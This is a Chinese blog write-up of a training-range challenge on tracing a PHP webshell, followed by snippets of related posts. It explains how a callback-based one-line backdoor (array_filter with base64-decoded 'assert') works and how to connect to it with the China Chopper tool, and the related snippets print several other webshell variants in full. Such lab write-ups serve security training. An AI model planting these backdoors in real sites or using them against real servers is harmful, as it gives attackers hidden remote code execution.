墨者学院-WebShell代码分析溯源(第4题)

最新推荐文章于 2022-11-29 10:45:44 发布
最新推荐文章于 2022-11-29 10:45:44 发布
阅读量340 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39998158/article/details/100548619
版权

WebShell代码分析溯源(第4题)

难易程度:★★
题目类型:代码审计
使用工具:FireFox浏览器、记事本、菜刀

1.访问网页,下载网页源代码。
2.发现hack文件夹里有可疑文件bin.php
在这里插入图片描述
3.打开发现确实是一句话木马
在这里插入图片描述
能发现代码运用了回调函数,只有我们在菜刀连接时e输入的参数等于assert的密文,才能构成一句话木马病毒。
我们通过base64把assert,密文为YXNzZXJ0。
4.知道参数后,我们尝试用菜刀连接
url为http://219.153.49.228:41472/www/hack/bin.php?e=YXNzZXJ0
密码为POST
在这里插入图片描述
5.连接成功,能发现在html文件夹中有key_d6dc80.php文件
在这里插入图片描述
6.打开文件就能获取key
在这里插入图片描述

JimWu95
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
墨者学院 - WebShell代码分析溯源(第4)
多崎巡礼的博客
08-02 672
唉让我如此信任的工具在这道上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
墨者 - WebShell代码分析溯源(第4)
吃肉唐僧的博客
07-12 261
下载文件,找到木马文件 发现一句木马变种 <?php error_reporting(0); $e=$_REQUEST['e']; $arr=array($_POST['POST'],); array_filter($arr,base64_decode($e)); ?> 这句话的意思是,获取url发过来的参数(base64加密过的)保存到$e,菜刀链接密码为POST,ar...
墨者学院-WebShell代码分析溯源(第6)
JimWu的博客
09-04 211
WebShell代码分析溯源(第6) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀、记事本 1.访问网页,下载网页源代码。 2.查看每个文件夹的源代码,发现在/Assets/upload中有可疑文件,php文件想冒充jpg。 3.打开文件,发现果然是一句话木马。 分析代码,了解到array_map属于回调函数。 base64_decode(e)为函数,e)为函数,...
墨者学院WebShell文件上传漏洞分析溯源(第4)
m0_66835614的博客
11-29 846
WebShell文件上传漏洞分析溯源(第4)
WEBWebShell代码分析溯源(第4)
HAPPY
08-19 1175
查看到可以webshell后定位到源代码:   这个的用法: get网址中传入 ?e=YXNzZXJ0   (arrest的base64加密值为YXNzZXJ0) 菜刀连接用法: http://www.xxx.com/3.php?e=YXNzZXJ0 密码:POST 详解:base64_decode()函数主要用于base64的解码,YXNzZXJ0的base64解码后的结果为...
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)
最新发布
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1)、PHP代码分析溯源(第2)、PHP逻辑漏洞利用实战(第1)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
APP原型实例:墨者科技-旅行小蜜APP2.0.rp
12-17
产品经理
0080 APP原型实例:墨者科技-旅行小蜜APP2.0.rp
01-06
rp原型源文件
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
3. **检测**:通过静态代码分析、动态运行时检测和漏洞扫描工具,可以发现潜在的代码执行风险。 4. **危害**:攻击者可以通过RCE漏洞执行任意命令,获取敏感信息,篡改数据,甚至完全控制服务器。 5. **修复**:最佳...
墨者学院 - WebShell代码分析溯源(第10)
多崎巡礼的博客
08-05 502
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。   &lt;?php error_reporting(0); $e = $_REQUEST['e']; declare(ticks=1); register_tick_function ($e, $_REQUEST...
墨者学院 - WebShell代码分析溯源(第9)
多崎巡礼的博客
08-05 815
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。     &lt;?php error_reporting(0); $e = $_REQUEST['e']; register_shutdown_function($e, $_REQUEST['joker']); ...
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 818
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680     &lt;?php error_reporting(0); call...
墨者学院 - WebShell代码分析溯源(第3)
多崎巡礼的博客
07-31 767
    $g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本 运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key   &lt;?php...
墨者学院 - WebShell代码分析溯源(第7)
多崎巡礼的博客
08-05 688
代码审查 在random_int.php 前排 发现以下回调后门 &lt;?php error_reporting(0); $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['POST']); uasort($arr, base64_decode($e)); 诸如此类还有 &lt;?php $e = $_REQUEST['...
墨者学院-WebShell代码分析溯源(第11)
JimWu的博客
09-04 241
WebShell代码分析溯源(第11) 难易程度:★★★ 目类型:代码审计 使用工具:FireFox浏览器、菜刀 1.打开靶场,下载备份文件。 2.解压文件,分析代码。 3.从代码中,知道当1=GET.fpz287时会生成t.php,所以我们要在url中输入。 我们继续分析一下代码,能看出代码中运用了str_replace函数。 该函数会把以其他字符替换字符串中的一些字符,在代码中就是把i...
墨者学院-WebShell代码分析溯源(第5)
JimWu的博客
09-04 346
WebShell代码分析溯源(第5) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀 1.访问网页,下载网页源代码。 2.审查php文件后发现了一个疑似木马的文件Exception.php。 3.打开文件,分析代码,有点像一句话木马。 分析后,发现call_user_func属于回调函数,第一个参数为函数,第二个参数作为回...
墨者学院-WebShell代码分析溯源(第9)
JimWu的博客
09-04 189
WebShell代码分析溯源(第9) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、Adobe Dreamweaver CS6、菜刀 1.访问网页,下载网页源代码。 2.根据最后的修改时间,确定可疑的文件。 3.打开文件,发现是一句话木马病毒。 register_shutdown_function函数是在代码执行完成后执行的,所以当e=assert时,把$_REQUES...
墨者学院-WebShell代码分析溯源(第3)
JimWu的博客
09-04 387
WebShell代码分析溯源(第3) 难易程度:★★ 目类型:代码审计 使用工具:FireFox浏览器、记事本、菜刀 1.访问网页,下载网页源代码。 2.审查后,能发现js文件夹里有个与众不同的文件,就是jquery1.42.min.php。 3.打开该文件,发现果然是变种一句话木马。 $g[1]=s chr('116')调用ASCII表,查找该表,知道116对应的是t 所以拼接起来就是$g...
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值